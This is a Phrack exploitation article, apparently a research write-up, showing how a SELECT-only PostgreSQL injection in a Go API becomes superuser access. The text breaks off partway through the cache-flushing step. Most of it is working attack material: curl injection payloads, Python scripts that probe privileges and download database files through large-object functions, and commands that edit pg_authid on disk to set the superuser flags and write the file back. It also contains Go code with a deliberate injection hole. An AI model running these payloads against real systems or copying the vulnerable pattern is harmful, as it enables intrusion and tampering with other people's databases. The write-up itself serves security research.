==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x08 of 0x11
|=-----------------------------------------------------------------------=|
|=-----------=[ World of SELECT-only PostgreSQL Injections: ]=-----------=|
|=--------------------=[ (Ab)using the filesystem ]=---------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[ Maksym Vatsyk ]=---------------------------=|
|=-----------------------------------------------------------------------=|
-- Table of contents
0 - Introduction
1 - The SQLi that started it all
1.0 - Target info
1.1 - A rather trivial injection
1.2 - No stacked queries for you
1.3 - Abusing server-side lo_ functions
1.4 - Not (entirely) a superuser
1.5 - Looking for a privesc
2 - PostgreSQL storage concepts
2.0 - Tables and Filenodes
2.1 - Filenode format
2.2 - Table metadata
2.3 - Cold and Hot data storage
2.4 - Editing filenodes offline
3 - Updating the PostgreSQL data without UPDATE
3.0 - Identifying target table
3.1 - Search for the associated Filenode
3.2 - Reading and downloading the Filenode
3.3 - Extracting table metadata
3.4 - Making ourselves a superuser
3.5 - Flushing Hot storage
4 - SELECT-only RCE
4.0 - Reading original postgresql.conf
4.1 - Choosing a parameter to exploit
4.2 - Compiling malicious library
4.3 - Uploading the config and library to the server
4.4 - Reload successful
5 - Conclusions
6 - References
7 - Source code
--[ 0 - Introduction
This article tells the story of how a failed attempt to exploit a basic
SQL injection in a web API with the PostgreSQL DBMS quickly spiraled into
3 months of researching database source code and (hopefully) helping to
create several new techniques to pwn Postgres hosts in restrictive
contexts. Let's get into the story, shall we?
--[ 1 - The SQLi that started it all
---[ 1.0 - Target info
The target web app was written in Go using the Gin[0] framework and used
PGX[1] as a DB driver. What is interesting about the application is that
it is a trusted public data repository - anyone can query all of the
data. Updates, however, are limited to a trusted set of users.
This means that getting a SELECT SQL injection will have no impact on the
application, while DELETE and UPDATE ones will still be critical.
Unfortunately, I am not allowed to disclose the source code of
the original application, but it can be roughly boiled down to this
example (with data and tables changed to something artificial):
--------------------------------------------------------------------------
package main

import (
    "context"
    "fmt"
    "net/http"

    "github.com/gin-gonic/gin"
    "github.com/jackc/pgx/v4/pgxpool"
)

var pool *pgxpool.Pool

type Phrase struct {
    ID   int    `json:"id"`
    Text string `json:"text"`
}

func phraseHandler(c *gin.Context) {
    phrases := []Phrase{}
    phrase_id := c.DefaultQuery("id", "1")
    query := fmt.Sprintf(
        "SELECT id, text FROM phrases WHERE id=%s",
        phrase_id,
    )
    rows, err := pool.Query(context.Background(), query)
    defer rows.Close()
    if err != nil {
        c.JSON(
            http.StatusInternalServerError,
            gin.H{"error": err.Error()},
        )
        return
    }
    for rows.Next() {
        var phrase Phrase
        err := rows.Scan(&phrase.ID, &phrase.Text)
        if err != nil {
            c.JSON(
                http.StatusInternalServerError,
                gin.H{"error": err.Error()},
            )
            return
        }
        phrases = append(phrases, phrase)
    }
    c.JSON(http.StatusOK, phrases)
}

func main() {
    pool, _ = pgxpool.Connect(
        context.Background(),
        "postgres://localhost/postgres?user=poc_user&password=poc_pass",
    )
    r := gin.Default()
    r.GET("/phrases", phraseHandler)
    r.Run(":8000")
    defer pool.Close()
}
--------------------------------------------------------------------------
---[ 1.1 - A rather trivial injection
The actual injection happens inside the phraseHandler function on these
lines of code. The app directly formats the query parameter id into
the query string and calls the pool.Query() function. It couldn't be any
simpler, right?
--------------------------------------------------------------------------
phrase_id := c.DefaultQuery("id", "1")
query := fmt.Sprintf(
    "SELECT id, text FROM phrases WHERE id=%s",
    phrase_id,
)
rows, err := pool.Query(context.Background(), query)
defer rows.Close()
--------------------------------------------------------------------------
The SQL injection can be quickly confirmed with these cURL requests:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=1"
[
{"id":1,"text":"Hello, world!"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=-1"
[]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode "id=-1 OR 1=1"
[
{"id":1,"text":"Hello, world!"},
{"id":2,"text":"A day in paradise."},
...
{"id":14,"text":"Find your inner peace."},
{"id":15,"text":"Dance in the rain"}
]
--------------------------------------------------------------------------
At this moment, our SQL query will look something like:
--------------------------------------------------------------------------
SELECT id, text FROM phrases WHERE id=-1 OR 1=1
--------------------------------------------------------------------------
Luckily for us, PostgreSQL connections normally support stacked queries,
which would open a wide range of attack vectors for us. We should be able
to append additional queries, separated by a semicolon, like so:
--------------------------------------------------------------------------
SELECT id, text FROM phrases WHERE id=-1; SELECT pg_sleep(5);
--------------------------------------------------------------------------
Let's just try it... Oh no, what is that?
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" \
--data-urlencode "id=-1; SELECT pg_sleep(5)"
{
"error":"ERROR: cannot insert multiple commands into a prepared
statement (SQLSTATE 42601)"
}
--------------------------------------------------------------------------
---[ 1.2 - No stacked queries for you
It turns out that the PGX developers decided to **secure** driver use
by converting any SQL query to a prepared statement under the hood.
This is done to disable any stacked queries whatsoever[2]. It works
because the PostgreSQL database itself does not allow multiple queries
inside a single prepared statement[3].
So, we are suddenly constrained to a single SELECT query! The DBMS will
reject any stacked queries, and nested UPDATE or DELETE queries are also
prohibited by the SQL syntax.
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (UPDATE * phrases SET text='lol')"
{
"error":"ERROR: syntax error at or near \"SET\" (SQLSTATE 42601)"
}
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (DELETE * FROM phrases)"
{
"error":"ERROR: syntax error at or near \"FROM\" (SQLSTATE 42601)"
}
--------------------------------------------------------------------------
Nested SELECT queries are still possible, though!
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 OR (SELECT 1)=1"
[
{"id":1,"text":"Hello, world!"},
...
{"id":14,"text":"Find your inner peace."},
{"id":15,"text":"Dance in the rain"}
]
--------------------------------------------------------------------------
Since one can read the DB data without the SQLi, is this bug even worth
reporting?
---[ 1.3 - Abusing server-side lo_ functions
Not all hope is lost, though! Since nested SELECT SQL queries are allowed,
we can try to call some of the built-in PostgreSQL functions and see if
there are any that can help us.
PostgreSQL has several functions that allow reading files from and writing
files to the server running the DBMS. These functions[4] are a part of the
PostgreSQL Large Objects functionality, and are accessible only to
superusers by default:
1. lo_import(path_to_file, lo_id) - read the file into the DB large object
2. lo_export(lo_id, path_to_file) - dump the large object into a file
What files can be read? Since the DBMS is normally running under the
postgres user, we can search for readable files via the following
command:
--------------------------------------------------------------------------
$ cat /etc/passwd | grep postgres
postgres:x:129:129::/var/lib/postgresql:/bin/bash
$ find / -uid 129 -type f -perm -600 2>/dev/null
...
/var/lib/postgresql/data/postgresql.conf <---- main service config
/var/lib/postgresql/data/pg_hba.conf <---- authentication config
/var/lib/postgresql/data/pg_ident.conf <---- psql username mapping
...
/var/lib/postgresql/13/main/base/1/2654 <---- some data files
/var/lib/postgresql/13/main/base/1/2613
--------------------------------------------------------------------------
There already is an RCE technique, initially discovered by Denis
Andzakovic[5] and sylsTyping[6] in 2021 and 2022, which takes advantage
of the postgresql.conf file.
It involves overwriting the config file and either waiting for the server
to reboot or forcefully reloading the configuration via the
pg_reload_conf() PostgreSQL function[7].
We will return to this matter later in the article. For now, let's just
check if we have the permissions to call every function mentioned above.
Calling lo_ functions:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_import('/var/lib/postgresql/data/postgresql.conf', 31337)) AS text)"
[
{"id":1337,"text":"31337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT lo_get(31337)) AS text)"
[
{"id":1337,"text":"\\x23202d2d2d...72650a"}
]
--------------------------------------------------------------------------
Large object functions work just fine! We've imported a file into the DB
and then read it back from the large object with ID 31337.
Calling pg_reload_conf function:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[]
--------------------------------------------------------------------------
There is a problem with the pg_reload_conf function, however. On success,
it should return a row containing the text "true" - yet we got an empty
result. Why can we call large object functions but not pg_reload_conf?
Shouldn't they both be accessible to a superuser?
---[ 1.4 - Not (entirely) a superuser
They should, but we happen to not be one. Our test user has explicit
permissions over the large object functions but lacks access to anything
else. The permissions should be similar to the below example
configuration:
--------------------------------------------------------------------------
CREATE USER poc_user WITH PASSWORD 'poc_pass';
GRANT pg_read_server_files TO poc_user;
GRANT pg_write_server_files TO poc_user;
GRANT USAGE ON SCHEMA public TO poc_user;
GRANT SELECT, INSERT, UPDATE, DELETE ON TABLE pg_largeobject TO poc_user;
GRANT EXECUTE ON FUNCTION lo_export(oid, text) TO poc_user;
GRANT EXECUTE ON FUNCTION lo_import(text, oid) TO poc_user;
--------------------------------------------------------------------------
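From the attacker's side, this kind of permission set can be fingerprinted
through the injection itself: PostgreSQL ships the has_function_privilege()
helper and the pg_user view for exactly this. Below is a minimal Python
sketch of such a probe; the endpoint URL and the UNION payload shape come
from the example app in section 1.0, everything else should be adapted per
target:
--------------------------------------------------------------------------
import requests

# Endpoint of the example app from section 1.0; adjust per target.
URL = 'http://172.23.16.127:8000/phrases'

def query(expr):
    # Wrap the expression in CAST(... AS text) so the Go handler can
    # scan the result into its string field.
    payload = "-1 UNION SELECT 1337, CAST((%s) AS text)" % expr
    rows = requests.get(URL, params={'id': payload}).json()
    return rows[0]['text'] if isinstance(rows, list) and rows else None

# Which of the interesting functions can we EXECUTE?
for fn in ('lo_import(text,oid)', 'lo_export(oid,text)', 'pg_reload_conf()'):
    print(fn, '->', query(
        "SELECT has_function_privilege(current_user, '%s', 'execute')" % fn))

# Are we a superuser already?
print('superuser ->', query(
    "SELECT usesuper FROM pg_user WHERE usename = current_user"))
--------------------------------------------------------------------------
If lo_import/lo_export come back "true" while everything else is locked
down, we are in exactly the situation described above.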
---[ 1.5 - Looking for a privesc
If we want to perform RCE through the configuration file reliably, we must
find a way to become a superuser and call pg_reload_conf(). Unlike the
popular topic of PostgreSQL RCE techniques, there is not a whole lot of
information about privilege escalation from within the DB.
Luckily for us, the official documentation page for Large Object functions
gives us some clues for the next steps[4]:
> It is possible to GRANT use of the server-side lo_import and lo_export
> functions to non-superusers, but careful consideration of the security
> implications is required. A malicious user of such privileges could
> easily parlay them into becoming superuser (for example by rewriting
> server configuration files)
What if we were to modify the PostgreSQL table data directly, on disk,
without any UPDATE queries at all?
--[ 2 - PostgreSQL storage concepts
---[ 2.0 - Tables and Filenodes
PostgreSQL has extremely complex data flows to optimize resource usage and
eliminate possible data access conflicts, e.g. race conditions. You can
read about them in great detail in the official documentation[8][9].
The physical data layout significantly differs from the widely known
"table" and "row" objects. All data is stored on disk in a Filenode object
named with the OID of the respective pg_class object.
In other words, each table has its own Filenode. We can look up the OID
and respective Filenode name of a given table with the following queries:
--------------------------------------------------------------------------
SELECT oid FROM pg_class WHERE relname='TABLE_NAME'
-- OR
SELECT pg_relation_filepath('TABLE_NAME');
--------------------------------------------------------------------------
All of the filenodes are stored in the PostgreSQL data directory, the
path to which superusers can query from the pg_settings table:
--------------------------------------------------------------------------
SELECT setting FROM pg_settings WHERE name = 'data_directory';
--------------------------------------------------------------------------
However, this value should generally be the same across different
installations of the DBMS and can be easily guessed by a third party.
A common path for PostgreSQL data directories on Debian systems is
"/var/lib/postgresql/MAJOR_VERSION/CLUSTER_NAME/".
We can obtain the major version by running a "SELECT version()" query in
the SQLi. The default value of CLUSTER_NAME is "main".
An example path of the filenode for our "phrases" table would be:
--------------------------------------------------------------------------
=== in psql ===
postgres=# SELECT pg_relation_filepath('phrases');
pg_relation_filepath
----------------------
base/13485/65549
(1 row)
postgres=# SELECT version();
version
-------------------------------------------------------------------------------------------------------------------------------------
PostgreSQL 13.13 (Ubuntu 13.13-1.pgdg22.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit
(1 row)
=== in bash ===
$ ll /var/lib/postgresql/13/main/base/13485/65549
-rw------- 1 postgres postgres 8192 mar 14 13:45 /var/lib/postgresql/13/main/base/13485/65549
--------------------------------------------------------------------------
So: all of the files with numeric names, found in section 1.3, are in
fact separate table filenodes that the postgres user can read and write!
---[ 2.1 - Filenode format
A Filenode is a binary file composed of separate chunks of 0x2000 bytes
called Pages. Each page holds the actual row data within nested Item
objects. The layout of each Filenode can be summarized with the below
diagram:
+----------+
| Filenode |
+----------+-------------------------------------------------------+
| |
| +--------+ |
| | Page 1 | |
| +--------+----+---------+---------+-----+---------+--------+ |
| | Page Header |Item ID 1|Item ID 2| ... |Item ID n| | |
| +-------------+----+----+---------+ +----+----+ | |
| | | | | |
| | +-------------------------+--------+ | |
| | | | | |
| | +-------------------------------------+ | | |
| | | | | |
| | | ... empty space padded with 0x00 ... | | |
| | | | | |
| | +----------------------+ | | |
| | | | | |
| | v v | |
| | +--------+ +--------+--------+ |
| | | Item n | ... | Item 2 | Item 1 | |
| +-------------------------+--------+-----+--------+--------+ |
| ... |
| +--------+ |
| | Page n | |
| +--------+ |
| ... |
| |
+------------------------------------------------------------------+
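To make this layout concrete, below is a minimal Python sketch that walks
the Page headers and ItemId arrays of a downloaded filenode. It assumes
the default 8kB page size and the standard on-disk structures (a 24-byte
PageHeaderData followed by packed 32-bit ItemIds); it is an illustration
of the format, not a replacement for a full parser:
--------------------------------------------------------------------------
import struct

PAGE_SIZE = 0x2000  # default BLCKSZ

def parse_page(page):
    # 24-byte PageHeaderData: pd_lsn, pd_checksum, pd_flags, pd_lower,
    # pd_upper, pd_special, pd_pagesize_version, pd_prune_xid
    (pd_lsn, pd_checksum, pd_flags, pd_lower, pd_upper, pd_special,
     pd_pagesize_version, pd_prune_xid) = struct.unpack_from('<QHHHHHHI',
                                                             page, 0)
    items = []
    # the ItemId array runs from byte 24 up to pd_lower, 4 bytes per entry
    for off in range(24, pd_lower, 4):
        (word,) = struct.unpack_from('<I', page, off)
        lp_off = word & 0x7fff           # bits 0..14: offset of the item
        lp_flags = (word >> 15) & 0x3    # bits 15..16: LP_* state flags
        lp_len = (word >> 17) & 0x7fff   # bits 17..31: length of the item
        if lp_flags == 1:                # LP_NORMAL, i.e. a live item
            items.append(page[lp_off:lp_off + lp_len])
    return items

with open('pg_authid_filenode', 'rb') as f:
    data = f.read()

for page_no in range(len(data) // PAGE_SIZE):
    page = data[page_no * PAGE_SIZE:(page_no + 1) * PAGE_SIZE]
    print('page %d: %d items' % (page_no, len(parse_page(page))))
--------------------------------------------------------------------------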
---[ 2.2 - Table metadata
It is worth noting that the Item objects are stored in binary format
and cannot be manipulated directly. One must first deserialize them using
metadata from the internal PostgreSQL "pg_attribute" table. We can query
Item metadata using the following SQL query:
--------------------------------------------------------------------------
SELECT
STRING_AGG(
CONCAT_WS(
',',
attname,
typname,
attlen,
attalign
),
';'
)
FROM pg_attribute
JOIN pg_type
ON pg_attribute.atttypid = pg_type.oid
JOIN pg_class
ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = 'TABLE_NAME';
--------------------------------------------------------------------------
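The query flattens every column into a "name,type,length,alignment" tuple.
A small Python helper matching the format produced above (a sketch, to
show what a filenode parser actually needs from this metadata):
--------------------------------------------------------------------------
def parse_metadata(blob):
    # blob looks like "oid,oid,4,i;rolname,name,64,c;..."
    columns = []
    for entry in blob.split(';'):
        attname, typname, attlen, attalign = entry.split(',')
        columns.append({
            'name': attname,
            'type': typname,
            'length': int(attlen),  # -1 marks variable-length (varlena)
            'align': attalign,      # c/s/i/d = 1/2/4/8-byte alignment
        })
    return columns
--------------------------------------------------------------------------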
---[ 2.3 - Cold and Hot data storage
All of the above objects make up the DBMS' cold storage. To access the
data in cold storage through a query, Postgres must first load it in the
RAM cache, a.k.a. hot storage.
The following diagram shows a rough and simplified flow of how PostgreSQL
accesses the data:
+------------------+ +--------+ +------+ +------+
|Table in RAM cache|------>|Filenode|--+--->|Page 1|---+--->|Item 1|
+------------------+ +--------+ | +------+ | +------+
| |
| +------+ | +------+
+--->|Page 2| +--->|Item 2|
| +------+ | +------+
| ... | ...
| +------+ | +------+
+--->|Page n| +--->|Item n|
+------+ +------+
The DBMS periodically flushes any changes to the data in hot storage to
the filesystem.
These syncs may pose a challenge to us! Since we can only edit the cold
storage of a running database, we risk subsequent hot storage syncs
overwriting our edits. Thus, we must ensure that the table we want to
overwrite has been offloaded from the cache.
--------------------------------------------------------------------------
# -----------------------------
# PostgreSQL configuration file
# -----------------------------
...
# - Memory -
shared_buffers = 128MB # min 128kB
# (change requires restart)
...
--------------------------------------------------------------------------
The default cache size is 128MB, i.e. 16,384 pages of 8kB each. So, if we
stress the DB with expensive queries to other tables/large objects before
the flush, we might overflow the cache and evict our target table from it.
---[ 2.4 - Editing filenodes offline
I've created a tool to parse and modify data stored in filenodes, which
functions independently of the Postgres server that created the filenodes.
We can use it to overwrite target table rows with our desired values.
The editor supports both datatype-assisted and raw parsing modes. The
assisted mode is the preferred option as it allows you to edit the data
safely, without accidentally messing up the whole filenode structure.
The actual parsing implementation is way too lengthy to discuss in this
article, but you can find the sources on GitHub[10] (or in the source
code section of this article) if you want to dig deeper into it. You can
also check out this article[12] on parsing filenodes in Golang.
--[ 3 - Updating the PostgreSQL data without UPDATE
---[ 3.0 - Identifying target table
So, we are looking to escalate our permissions to those of a DBMS
superuser. Which table should we aim to modify? All Postgres permissions
are stored in the internal table "pg_authid". All CREATE/DROP/ALTER
statements for new roles and users actually modify this table under the
hood. Let's inspect it in a PSQL session under the default super-admin
user:
--------------------------------------------------------------------------
postgres=# \x
Expanded display is on.
postgres=# SELECT * FROM pg_authid;
-[ RECORD 1 ]--+------------------------------------
oid | 3373
rolname | pg_monitor
rolsuper | f
rolinherit | t
rolcreaterole | f
rolcreatedb | f
rolcanlogin | f
rolreplication | f
rolbypassrls | f
rolconnlimit | -1
rolpassword |
rolvaliduntil |
... TRUNCATED ...
-[ RECORD 9 ]--+------------------------------------
oid | 10
rolname | postgres
rolsuper | t
rolinherit | t
rolcreaterole | t
rolcreatedb | t
rolcanlogin | t
rolreplication | t
rolbypassrls | t
rolconnlimit | -1
rolpassword |
rolvaliduntil |
-[ RECORD 10 ]-+------------------------------------
oid | 16386
rolname | poc_user
rolsuper | f
rolinherit | t
rolcreaterole | f
rolcreatedb | f
rolcanlogin | t
rolreplication | f
rolbypassrls | f
rolconnlimit | -1
rolpassword | md58616944eb80b569f7be225c2442582cd
rolvaliduntil |
--------------------------------------------------------------------------
The table contains a bunch of "rol" boolean flags and other interesting
stuff, like the MD5 hashes of the user logon passwords. The default
superadmin user "postgres" has all boolean flags set to true.
To become a superuser, we must flip all of the boolean fields to true for
our user, "poc_user".
---[ 3.1 - Search for the associated Filenode
To modify the table, we must first locate and read the filenode from the
disk. As discussed previously, we won't be able to get the data directory
setting from the DBMS, as we lack permissions to read the "pg_settings"
table:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT setting FROM pg_settings WHERE name='data_directory')"
{
"error":"can't scan into dest[1]: cannot scan null into *string"
}
--------------------------------------------------------------------------
However, we can reliably guess the data directory path by querying the
version of the DBMS:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT version())"
[
{"id":1337,"text":"PostgreSQL 13.13 (Ubuntu 13.13-1.pgdg22.04+1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit"}
]
--------------------------------------------------------------------------
Version information gives us more than enough knowledge about the DBMS
and the underlying server. We can simply install PostgreSQL 13 on our own
Ubuntu 22.04 VM and find that the data directory is
"/var/lib/postgresql/13/main":
--------------------------------------------------------------------------
ubuntu@ubuntu-virtual-machine:~$ uname -a
Linux ubuntu-virtual-machine 6.5.0-14-generic #14~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon Nov 20 18:15:30 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
ubuntu@ubuntu-virtual-machine:~$ sudo su postgres
postgres@ubuntu-virtual-machine:~$ pwd
/var/lib/postgresql
postgres@ubuntu-virtual-machine:~$ ls -l 13/main/
total 84
drwx------ 5 postgres postgres 4096 lis 26 14:48 base
drwx------ 2 postgres postgres 4096 mar 15 11:56 global
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_commit_ts
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_dynshmem
drwx------ 4 postgres postgres 4096 mar 15 11:55 pg_logical
drwx------ 4 postgres postgres 4096 lis 26 14:48 pg_multixact
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_notify
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_replslot
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_serial
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_snapshots
drwx------ 2 postgres postgres 4096 mar 11 00:45 pg_stat
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_stat_tmp
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_subtrans
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_tblspc
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_twophase
-rw------- 1 postgres postgres 3 lis 26 14:48 PG_VERSION
drwx------ 3 postgres postgres 4096 lut 4 00:22 pg_wal
drwx------ 2 postgres postgres 4096 lis 26 14:48 pg_xact
-rw------- 1 postgres postgres 88 lis 26 14:48 postgresql.auto.conf
-rw------- 1 postgres postgres 130 mar 15 11:55 postmaster.opts
-rw------- 1 postgres postgres 100 mar 15 11:55 postmaster.pid
--------------------------------------------------------------------------
With the data directory path obtained, we can query the relative path to
the "pg_authid" Filenode. Thankfully, there are no permission issues this
time.
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, (SELECT pg_relation_filepath('pg_authid'))"
[
{"id":1337,"text":"global/1260"}
]
--------------------------------------------------------------------------
With all the information in our hands, we can assume that the "pg_authid"
Filenode is located at "/var/lib/postgresql/13/main/global/1260".
Let's download it to our local machine from the target server.
---[ 3.2 - Reading and downloading the Filenode
We can now quickly download the file as a base64 string through the
Large Object functions "lo_import" and "lo_get" in the following steps:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_import('/var/lib/postgresql/13/main/global/1260', 331337)) AS text)"
[
{"id":1337,"text":"331337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,translate(encode(lo_get(331337), 'base64'), E'\n', '')" | jq ".[].text" -r | base64 -d > pg_authid_filenode
--------------------------------------------------------------------------
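The one-shot download above is fine for a small filenode, but for bigger
tables a single JSON response can get unwieldy. Since lo_get() also has a
(oid, offset, length) form, the transfer can be chunked. A hedged Python
sketch, reusing the endpoint of the example app from section 1.0:
--------------------------------------------------------------------------
import base64
import requests

URL = 'http://172.23.16.127:8000/phrases'  # example app from section 1.0
LO_ID = 331337                             # large object imported above
CHUNK = 4096                               # bytes per request

def fetch_chunk(offset):
    expr = ("translate(encode(lo_get(%d, %d, %d), 'base64'), E'\\n', '')"
            % (LO_ID, offset, CHUNK))
    rows = requests.get(URL, params={
        'id': '-1 UNION SELECT 1337, %s' % expr}).json()
    return base64.b64decode(rows[0]['text'])

blob = b''
while True:
    chunk = fetch_chunk(len(blob))
    blob += chunk
    if len(chunk) < CHUNK:  # short read means we reached the end
        break

with open('pg_authid_filenode', 'wb') as f:
    f.write(blob)
--------------------------------------------------------------------------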
After decoding the Base64 into a file, we can confirm that we indeed
successfully downloaded the "pg_authid" Filenode by comparing the hashes.
--------------------------------------------------------------------------
=== on the attacker server ===
$ md5sum pg_authid_filenode
4c9514c6fb515907b75b8ac04b00f923 pg_authid_filenode
=== on the target server ===
postgres@ubuntu-virtual-machine:~$ md5sum /var/lib/postgresql/13/main/global/1260
4c9514c6fb515907b75b8ac04b00f923 /var/lib/postgresql/13/main/global/1260
--------------------------------------------------------------------------
---[ 3.3 - Extracting table metadata
One last step before parsing the downloaded Filenode -- we must get its
metadata from the server via the following SQLi query:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,STRING_AGG(CONCAT_WS(',',attname,typname,attlen,attalign),';') FROM pg_attribute JOIN pg_type ON pg_attribute.atttypid = pg_type.oid JOIN pg_class ON pg_attribute.attrelid = pg_class.oid WHERE pg_class.relname = 'pg_authid'"
[
{"id":1337,"text":"tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d"}
]
--------------------------------------------------------------------------
We should now be able to use our in-house Python3 Filenode editor to list
the data and confirm it is intact. The output for the "rolname" field will
be a bit ugly, because this field has the internal "name" type - a
fixed-length, 64-byte string padded with null bytes - instead of the
common varchar type:
--------------------------------------------------------------------------
$ python3 postgresql_filenode_editor.py \
-f ./pg_authid_filenode \
-m list \
--datatype-csv "tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d"
[+] Page 0:
--------- item no. 0 ---------
oid : 10
rolname : b'postgres\x00...'
rolsuper : 1
rolinherit : 1
rolcreaterole : 1
rolcreatedb : 1
rolcanlogin : 1
rolreplication: 1
rolbypassrls : 1
rolconnlimit : -1
rolpassword : None
--------- item no. 1 ---------
oid : 3373
rolname : b'pg_monitor\x00...'
rolsuper : 0
rolinherit : 1
rolcreaterole : 0
rolcreatedb : 0
rolcanlogin : 0
rolreplication: 0
rolbypassrls : 0
rolconnlimit : -1
rolpassword : None
... TRUNCATED ...
--------- item no. 9 ---------
oid : 16386
rolname : b'poc_user\x00...'
rolsuper : 0
rolinherit : 1
rolcreaterole : 0
rolcreatedb : 0
rolcanlogin : 1
rolreplication: 0
rolbypassrls : 0
rolconnlimit : -1
rolpassword : b'md58616944eb80b569f7be225c2442582cd'
--------------------------------------------------------------------------
---[ 3.4 - Making ourselves a superuser
We can now use the Filenode editor to update Item no. 9, which contains
the entry for "poc_user". For convenience, we can pass any non-printable
fields (such as the "rolname" field) as base64 strings. We will flip all
"rol" flags to 1 with the following editor command:
--------------------------------------------------------------------------
$ python3 postgresql_filenode_editor.py \
-f ./pg_authid_filenode \
-m update \
-p 0 \
-i 9 \
--datatype-csv "tableoid,oid,4,i;cmax,cid,4,i;xmax,xid,4,i;cmin,cid,4,i;xmin,xid,4,i;ctid,tid,6,s;oid,oid,4,i;rolname,name,64,c;rolsuper,bool,1,c;rolinherit,bool,1,c;rolcreaterole,bool,1,c;rolcreatedb,bool,1,c;rolcanlogin,bool,1,c;rolreplication,bool,1,c;rolbypassrls,bool,1,c;rolconnlimit,int4,4,i;rolpassword,text,-1,i;rolvaliduntil,timestamptz,8,d" \
--csv-data "16386,cG9jX3VzZXIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==,1,1,1,1,1,1,1,-1,md58616944eb80b569f7be225c2442582cd,NULL"
--------------------------------------------------------------------------
The script will save the updated Filenode to a file with ".new" as an
extension. We can now re-upload the data to the PostgreSQL server and
overwrite the original data through the SQLi.
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(3331337, decode('$(base64 -w 0 pg_authid_filenode.new)', 'base64'))) AS text)"
[
{"id":1337,"text":"3331337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(3331337, '/var/lib/postgresql/13/main/global/1260')) AS text)"
[{"id":1337,"text":"1"}]
--------------------------------------------------------------------------
So, we've just overwritten the Filenode on the disk! But the RAM cache
still has the old data. We must find a way to flush it somehow:
--------------------------------------------------------------------------
postgres=# \x
Expanded display is on.
postgres=# SELECT * FROM pg_authid WHERE rolname='poc_user';
-[ RECORD 1 ]--+------------------------------------
oid | 16386
rolname | poc_user
rolsuper | f
rolinherit | t
rolcreaterole | f
rolcreatedb | f
rolcanlogin | t
rolreplication | f
rolbypassrls | f
rolconnlimit | -1
rolpassword | md58616944eb80b569f7be225c2442582cd
rolvaliduntil |
--------------------------------------------------------------------------
---[ 3.5 - Flushing Hot storage
So, you may be wondering - how can we force the server to clean the RAM
cache? How about creating a Large Object of a size matching the entire
cache pool? :DDDDD
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(33331337, (SELECT REPEAT('a', 128*1024*1024))::bytea)) AS text)"
[
{"id":1337,"text":"33331337"}
]
--------------------------------------------------------------------------
The server took at least 5 seconds to process our query, which may
